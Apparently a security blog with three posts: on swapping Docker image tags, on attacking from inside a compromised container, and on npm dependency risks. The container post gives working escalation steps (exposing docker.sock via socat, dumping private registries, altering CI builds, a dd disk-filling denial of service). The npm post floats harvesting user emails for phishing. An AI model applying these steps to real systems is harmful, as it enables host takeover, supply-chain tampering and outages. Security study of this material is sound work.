Potential risk using Docker Registry

Some people recommend to use your own Private Registry for your images instead the public one. The real problem becomes when you do not have full control of the images. Let me expose an example.

Chain of images

Do you know how many images do you store every time you pull an unknown image? You can use this tool for a graph like mine:

Images chain tree
Image chain tree (Even I removed lots of old images last week)

The truth is that when you are preparing your own image you don’t think too much about the ones in the middle, don’t you? But, will you notice that a layer in the middle changed?

1. Create an image `harmless`

$ docker pull busybox
$ docker run busybox touch /harmless
$ docker commit fbea5a2af7b4 martes13/harmless:1.0
$ docker push martes13/harmless:1.0

2. Let it be consumed

$ docker build .
Sending build context to Docker daemon 2.048 kB
Sending build context to Docker daemon
Step 0 : FROM martes13/harmless:1.0
---> 177b857f26b2
Step 1 : RUN touch /helloworld
---> Using cache
---> 3956484611c5
Step 2 : CMD /bin/sh
---> Running in 22425198de95
---> 62577fd6e477
Removing intermediate container 22425198de95
Successfully built 62577fd6e477
$ docker run -it 62577fd6e477
/ # ls
[..] harmless    helloworld [..]

3. Transform `harmless` into `harmful`

$ docker pull martes13/harmless:1.0
$ docker run martes13/harmless:1.0 touch /harmfull
$ docker commit 4dd3248e115a martes13/harmless:1.0
$ docker push martes13/harmless:1.0

4. Let update progressively all consumers

$ docker build .
[..]
$ docker run -it 7924ddc5e198
/ # ls
[..]        harmful     harmless    helloworld    [..]

What happened?

Maybe you did not noticed, but we updated an old version (1.0) with a new image pointer. You could think that you are using something well-tested and that will not change, but it did. So if an evil guy is able to steal your account full of used images, he will be able to modify all versions and spread something evil to all your fans.

Solutions

Well, official images are out of the scope. Their signature is verified so they “cannot” be changed.

And then, in the newest version 1.6 (now we use 1.5) there is a new feature which allows to download checking the Digest (sha256), so you will be able to check if there is any change. We will have image:tag or image@digest . Sounds good.

Before that, I propose 2 solutions:

1. Create your own Private Registry and ensure that the root images do not change (read my last post)

2. Apply unit tests when your new images is built. As everything in your image is a file, just ensure that nothing unexpected is there (diff from last one?). Halt the execution until human QA verifies it if something changed.

PD: Today Docker got $95M of investment…

Advertisement
Potential risk using Docker Registry

Practical Security inside a Dockerized Network

Imagine you have a bash shell in a machine but you realize it’s a docker container. How would you proceed to go deeper?

Step 1. Understand your container

Usually you won’t be able to use 0-days against the kernel but you won’t find extra security measures either (expect when running a non-root user). Vectors attacks or methodologies haven’t changed at all but this context is a bit special.

You are in a container which can disappear at any moment. It’s probably stateless and has a single responsibility. The operative system is quite safe by default because it uses minimum capacities to operate. Forget to leave a bind shell (or reverse) and come back later. They only need to patch, build, push, pull and deploy. Maybe 10 minutes? Time runs against you.

As soon as you obtain a bash shell (somehow), you must reverse the definition of this container. There are 2 elements to guess:

Dockerfile: Instructions writes files, so you only need to diff against the original image. Even there is a public registry, using a basic image (ex. busybox, ubuntu, debian, fedora, …) could be enough.

$ find / -type f ! -path "/sys*" ! -path "/proc*" -exec md5sum {} +

docker arguments: These are the keys for pivoting. Try to rebuild the original “docker run …” execution line.

Volumes $ mount
$ df
Links $ net ip
$ cat /etc/hosts
Environment (+ports) $ env

STEP 2. Find the weakest point

The most common vulnerability, now and forever, will be default and wrong configurations: human mistakes. Understand the platform and try to extract sensitive data using the designed flow. Probably it’s so lose that you will be able to dump the full database.

I have seen several docker related projects use this line:

$ docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu

(or as a Host:Port with or without SSL). Install socat for connecting to the sock:

$ apt-get install socat
$ socat TCP4-LISTEN:1337,fork UNIX-CONNECT:/var/run/docker.sock &

Then, read the doc: https://docs.docker.com/reference/api/. You have several options. For example, you could export another containers as raw data or create a new container mounting the root directory as a folder. You can successfully compromise the full machine in this scenario and most importantly you will have a lot of critical information to use against the internal network.

Another far more complex vector is to take advantage of ephemeral processes that can be running in our compromised machine and open new vulnerabilities into another machines. For example, a Jenkins uses our compromised development machine to build and push a new image into the registry. You can use tools like `inotify`, detect this process, and if there is a shared volume (data-pattern), change the code before it’s pushed.

STEP 3. Complementary software

In real production environments it is not common to execute raw docker commands for starting processes. These tools are quickly identified as they don’t expect you there.

Docker-compose sets as environment variables all the linked containers with their ports. However, tools like this are going to be hell for an intruder. It’s pretty easy to set volumes as read-only, limit cpu, memory, etc.

Supervisord is a process control system which will work as pid 1 and manage the sub-processes in that container. If you are so lucky to have enough access you will find the logs of all running applications in /var/log/supervisor/ . In the case that the app was running directly as a command/entry-point I think you cannot obtain this information.

Docker-registry is a private repository and is without a doubt your goal. Maybe you can scan the whole internal network searching the default port 5000 open, or you can try to guess their backend (s3?) and retrieve the images, or you can access to the Redis instance used as cache, etc. The registry doesn’t provide directly Auth. It has to be provided by extra tools (nginx, ..) or what is called Index Auth service. So if you find the HTTP/s API, start with GET /v1/search and dump everything. You will also be able to push something.

An example of what I’m talking about: http://blog.programster.org/2015/03/17/run-your-own-private-docker-registry/ . It’s protected from outside (SSL + firewall) but once you are in one container you have free access to any image.

Consul provides information about domain resolution and a key/value storage. It has a security model for MITM and other attacks, but also an ACL feature. However, ACL are disabled by default. (It’s another great tool that needs to be mentioned)

There are a bunch of new tools appearing which use docker to optimize a specific kind of task. They use to have some kind of security in mind but must be enabled and properly configured. Quick and dirty feature development, not enough QA work, using beta or alpha version, etc are the keys for finding a bogus system.

bonus. Denial of Service

If you want to directly crash the machine (which uses more than your container), probably the easier option is:

$ dd if=/dev/zero of=/fileOrPartition (or /mounted_volume_file)

Docker is able to limit the resources of the CPU, Memory, SWAP, … but it still doesn’t let you limit the harddrive. Probably you are able to get it full and something will crash.

Conclusion

This article was quite simple but I don’t like when people talks about the security in docker from only a theoretical viewpoint. Hope you enjoyed it. (And yes, to obtain a shell in a container is NOT trivial).

More advice here: https://github.com/GDSSecurity/Docker-Secure-Deployment-Guidelines

Practical Security inside a Dockerized Network

State of Art :: node’s security

These days I have been working on designing an API REST in NodeJS, discovering some security bugs in our third party libraries. I am very worried because you cannot avoid using them, and you know that if you discover some bugs, there will be other, more dangerous bugs there.

I am surprised how fast NodeJS spread, but it is easy to understand when you watch some Google.IO talks. The V8 engine is wonderful. It was developed from scratch, focusing on performance as much as possible. If we compare it against an Apache webserver (multi-process/multi-thread), they have compressed all the different independent layers into one, being able to optimize the whole stack, but removing all the “sometimes useful” features (like “data isolation”).

From my point of view, we have to move in this direction (reducing your hardware costs is a must), but it comes with new challenges for developers. It reminds me of Android when I was researching the platform, because in the end, both of them have bugs well-known in “””deprecated””” software (like Apache?).

And that is why last week I joined to the group nodesecurity.io . I want to contribute to and give advice to the community of NodeJS about the common mistakes and not so common when you develop an application. Very often they are technical bugs, just because we could not use an ORM or good enough Authentication/Authorization layers, or because we used functions like EVAL, but in some occasions they are functional bugs that you cannot solve with a patch because it depends on the behavior/workflow of your application.

I think that security is very close to read metrics, apply automation, testing, and then developing tools that help you to discover bottlenecks or shortcomings. Thanks to github, the dependency manager and NodeJS itself, it is easy to discover potential risks (and exploit them).

So, because this is the first post, I am going to start writing about the dependency manager.

npm registry

The project uses a CouchDB database to save all the applications & users. Because we lack privileges if we try to retrieve information from these databases directly, we can take profit of the proxy and download both database with these urls: https://registry.npmjs.org/-/all/ && https://registry.npmjs.org/-/users/ . Why would you want >44.000 emails address from the same place? I propose a ‘spear phishing’ experiment, but not today.

We also can draw a graph from the application database like this:

Graph by Libreoffice4

We can see that the probability to use non-updated software is considerable, and I am sure that you agree that it directly increases the risk. We should check other factors like “time of live”, “versions released”, “community”, but the graph gives a first idea. Some of you will think that a stable version is good enough to be used, but remember that we are speaking about NodeJS. One year ago did we have v0.6 or v0.4? For example, I could not use node-gd/gd because they did not compile.

0.0.1

Because there are some tricks in npm that we should look at when we want to deploy and run our application, I developed a script that we could use whenever to check about some information of our packages. Feel free to use and append to your hooks of git (pre-commit), and… leave a comment if you think that other features would be good 🙂 really appreciated!

https://gist.github.com/m13/0c564f93eefb97155302

Features:

– Check npm-shrinkwrap.json file

– Check if you have change the npm config register variable

– Check how many dependencies and sort them by last updated

State of Art :: node’s security